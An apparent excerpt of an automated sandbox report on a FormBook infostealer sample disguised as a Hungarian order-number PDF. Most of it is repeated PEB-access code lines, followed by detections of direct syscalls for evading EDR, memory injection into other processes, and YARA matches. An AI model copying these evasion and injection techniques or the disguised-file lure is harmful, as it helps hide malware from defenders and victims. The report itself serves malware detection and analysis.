            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B440 mov eax, dword ptr fs:[00000030h]5_2_3356B440
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B440 mov eax, dword ptr fs:[00000030h]5_2_3356B440
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B440 mov eax, dword ptr fs:[00000030h]5_2_3356B440
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B440 mov eax, dword ptr fs:[00000030h]5_2_3356B440
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B440 mov eax, dword ptr fs:[00000030h]5_2_3356B440
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356B440 mov eax, dword ptr fs:[00000030h]5_2_3356B440
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363547F mov eax, dword ptr fs:[00000030h]5_2_3363547F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B450 mov eax, dword ptr fs:[00000030h]5_2_3360B450
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B450 mov eax, dword ptr fs:[00000030h]5_2_3360B450
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B450 mov eax, dword ptr fs:[00000030h]5_2_3360B450
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360B450 mov eax, dword ptr fs:[00000030h]5_2_3360B450
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F453 mov eax, dword ptr fs:[00000030h]5_2_3361F453
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33561460 mov eax, dword ptr fs:[00000030h]5_2_33561460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33561460 mov eax, dword ptr fs:[00000030h]5_2_33561460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33561460 mov eax, dword ptr fs:[00000030h]5_2_33561460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33561460 mov eax, dword ptr fs:[00000030h]5_2_33561460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33561460 mov eax, dword ptr fs:[00000030h]5_2_33561460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F460 mov eax, dword ptr fs:[00000030h]5_2_3357F460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F460 mov eax, dword ptr fs:[00000030h]5_2_3357F460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F460 mov eax, dword ptr fs:[00000030h]5_2_3357F460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F460 mov eax, dword ptr fs:[00000030h]5_2_3357F460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F460 mov eax, dword ptr fs:[00000030h]5_2_3357F460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F460 mov eax, dword ptr fs:[00000030h]5_2_3357F460
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E7410 mov eax, dword ptr fs:[00000030h]5_2_335E7410
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358340D mov eax, dword ptr fs:[00000030h]5_2_3358340D
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336094E0 mov eax, dword ptr fs:[00000030h]5_2_336094E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336354DB mov eax, dword ptr fs:[00000030h]5_2_336354DB
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33569486 mov eax, dword ptr fs:[00000030h]5_2_33569486
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33569486 mov eax, dword ptr fs:[00000030h]5_2_33569486
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B480 mov eax, dword ptr fs:[00000030h]5_2_3355B480
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335574B0 mov eax, dword ptr fs:[00000030h]5_2_335574B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335574B0 mov eax, dword ptr fs:[00000030h]5_2_335574B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335934B0 mov eax, dword ptr fs:[00000030h]5_2_335934B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33603B60 mov eax, dword ptr fs:[00000030h]5_2_33603B60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33603B60 mov eax, dword ptr fs:[00000030h]5_2_33603B60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33603B60 mov eax, dword ptr fs:[00000030h]5_2_33603B60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33603B60 mov eax, dword ptr fs:[00000030h]5_2_33603B60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33603B60 mov eax, dword ptr fs:[00000030h]5_2_33603B60
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F5B50 mov eax, dword ptr fs:[00000030h]5_2_335F5B50
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F5B50 mov eax, dword ptr fs:[00000030h]5_2_335F5B50
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355FB4C mov edi, dword ptr fs:[00000030h]5_2_3355FB4C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33561B04 mov eax, dword ptr fs:[00000030h]5_2_33561B04
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33561B04 mov eax, dword ptr fs:[00000030h]5_2_33561B04
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DB00 mov eax, dword ptr fs:[00000030h]5_2_3358DB00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DB00 mov eax, dword ptr fs:[00000030h]5_2_3358DB00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DB00 mov eax, dword ptr fs:[00000030h]5_2_3358DB00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DB00 mov eax, dword ptr fs:[00000030h]5_2_3358DB00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DB00 mov eax, dword ptr fs:[00000030h]5_2_3358DB00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DB00 mov edx, dword ptr fs:[00000030h]5_2_3358DB00
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361FB0C mov eax, dword ptr fs:[00000030h]5_2_3361FB0C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33599B28 mov eax, dword ptr fs:[00000030h]5_2_33599B28
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33599B28 mov eax, dword ptr fs:[00000030h]5_2_33599B28
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573BD6 mov eax, dword ptr fs:[00000030h]5_2_33573BD6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573BD6 mov eax, dword ptr fs:[00000030h]5_2_33573BD6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573BD6 mov eax, dword ptr fs:[00000030h]5_2_33573BD6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573BD6 mov eax, dword ptr fs:[00000030h]5_2_33573BD6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573BD6 mov eax, dword ptr fs:[00000030h]5_2_33573BD6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EFBDC mov eax, dword ptr fs:[00000030h]5_2_335EFBDC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EFBDC mov eax, dword ptr fs:[00000030h]5_2_335EFBDC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EFBDC mov eax, dword ptr fs:[00000030h]5_2_335EFBDC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33569BC4 mov eax, dword ptr fs:[00000030h]5_2_33569BC4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361FBF3 mov eax, dword ptr fs:[00000030h]5_2_3361FBF3
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33557BCD mov eax, dword ptr fs:[00000030h]5_2_33557BCD
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33557BCD mov ecx, dword ptr fs:[00000030h]5_2_33557BCD
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A1BEF mov eax, dword ptr fs:[00000030h]5_2_335A1BEF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335A1BEF mov eax, dword ptr fs:[00000030h]5_2_335A1BEF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33599B9F mov eax, dword ptr fs:[00000030h]5_2_33599B9F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33599B9F mov eax, dword ptr fs:[00000030h]5_2_33599B9F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33599B9F mov eax, dword ptr fs:[00000030h]5_2_33599B9F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33629B8B mov eax, dword ptr fs:[00000030h]5_2_33629B8B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33629B8B mov eax, dword ptr fs:[00000030h]5_2_33629B8B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361FB97 mov eax, dword ptr fs:[00000030h]5_2_3361FB97
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DBA0 mov eax, dword ptr fs:[00000030h]5_2_3358DBA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DBA0 mov eax, dword ptr fs:[00000030h]5_2_3358DBA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DBA0 mov eax, dword ptr fs:[00000030h]5_2_3358DBA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DBA0 mov eax, dword ptr fs:[00000030h]5_2_3358DBA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DBA0 mov eax, dword ptr fs:[00000030h]5_2_3358DBA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DBA0 mov eax, dword ptr fs:[00000030h]5_2_3358DBA0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559A40 mov ecx, dword ptr fs:[00000030h]5_2_33559A40
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F3A78 mov eax, dword ptr fs:[00000030h]5_2_335F3A78
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F3A78 mov eax, dword ptr fs:[00000030h]5_2_335F3A78
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F3A78 mov eax, dword ptr fs:[00000030h]5_2_335F3A78
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F3A78 mov eax, dword ptr fs:[00000030h]5_2_335F3A78
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F3A78 mov eax, dword ptr fs:[00000030h]5_2_335F3A78
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F3A78 mov eax, dword ptr fs:[00000030h]5_2_335F3A78
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33589A18 mov ecx, dword ptr fs:[00000030h]5_2_33589A18
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DDA1D mov eax, dword ptr fs:[00000030h]5_2_335DDA1D
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355BA10 mov eax, dword ptr fs:[00000030h]5_2_3355BA10
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33595A01 mov eax, dword ptr fs:[00000030h]5_2_33595A01
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33595A01 mov ecx, dword ptr fs:[00000030h]5_2_33595A01
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33595A01 mov eax, dword ptr fs:[00000030h]5_2_33595A01
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33595A01 mov eax, dword ptr fs:[00000030h]5_2_33595A01
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361FA02 mov eax, dword ptr fs:[00000030h]5_2_3361FA02
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356BA30 mov eax, dword ptr fs:[00000030h]5_2_3356BA30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356BA30 mov ecx, dword ptr fs:[00000030h]5_2_3356BA30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356BA30 mov eax, dword ptr fs:[00000030h]5_2_3356BA30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356BA30 mov eax, dword ptr fs:[00000030h]5_2_3356BA30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356BA30 mov eax, dword ptr fs:[00000030h]5_2_3356BA30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356BA30 mov eax, dword ptr fs:[00000030h]5_2_3356BA30
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360BA0B mov eax, dword ptr fs:[00000030h]5_2_3360BA0B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360BA0B mov eax, dword ptr fs:[00000030h]5_2_3360BA0B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360BA0B mov eax, dword ptr fs:[00000030h]5_2_3360BA0B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360BA0B mov eax, dword ptr fs:[00000030h]5_2_3360BA0B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33607A11 mov edi, dword ptr fs:[00000030h]5_2_33607A11
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DA20 mov eax, dword ptr fs:[00000030h]5_2_3358DA20
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358DA20 mov eax, dword ptr fs:[00000030h]5_2_3358DA20
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358BADA mov eax, dword ptr fs:[00000030h]5_2_3358BADA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335F5AD0 mov eax, dword ptr fs:[00000030h]5_2_335F5AD0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E1ACB mov eax, dword ptr fs:[00000030h]5_2_335E1ACB
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E1ACB mov ecx, dword ptr fs:[00000030h]5_2_335E1ACB
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355BAE0 mov eax, dword ptr fs:[00000030h]5_2_3355BAE0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33611AA3 mov eax, dword ptr fs:[00000030h]5_2_33611AA3
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33611AA3 mov eax, dword ptr fs:[00000030h]5_2_33611AA3
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33611AA3 mov eax, dword ptr fs:[00000030h]5_2_33611AA3
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360DAAC mov ecx, dword ptr fs:[00000030h]5_2_3360DAAC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360DAAC mov ecx, dword ptr fs:[00000030h]5_2_3360DAAC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360DAAC mov eax, dword ptr fs:[00000030h]5_2_3360DAAC
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33557A80 mov eax, dword ptr fs:[00000030h]5_2_33557A80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33557A80 mov eax, dword ptr fs:[00000030h]5_2_33557A80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33557A80 mov eax, dword ptr fs:[00000030h]5_2_33557A80
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361FA87 mov eax, dword ptr fs:[00000030h]5_2_3361FA87
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355FAA4 mov ecx, dword ptr fs:[00000030h]5_2_3355FAA4

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: NULL target: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeProcess created: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"Jump to behavior
            Source: C:\Program Files (x86)\iqMHvVOKBieXtnounOyflFtrNYnIPhcrBttCxJJfwhvcvhvFacMU\SkCSKJeVGx.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
            Source: SkCSKJeVGx.exe, 00000006.00000002.2971934184.0000000001391000.00000002.00000001.00040000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000000.2855426804.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: SkCSKJeVGx.exe, 00000006.00000002.2971934184.0000000001391000.00000002.00000001.00040000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000000.2855426804.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: SkCSKJeVGx.exe, 00000006.00000002.2971934184.0000000001391000.00000002.00000001.00040000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000000.2855426804.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: SkCSKJeVGx.exe, 00000006.00000002.2971934184.0000000001391000.00000002.00000001.00040000.00000000.sdmp, SkCSKJeVGx.exe, 00000006.00000000.2855426804.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2971931474.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2968077635.0000000033220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2971855670.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2972278364.0000000002B40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
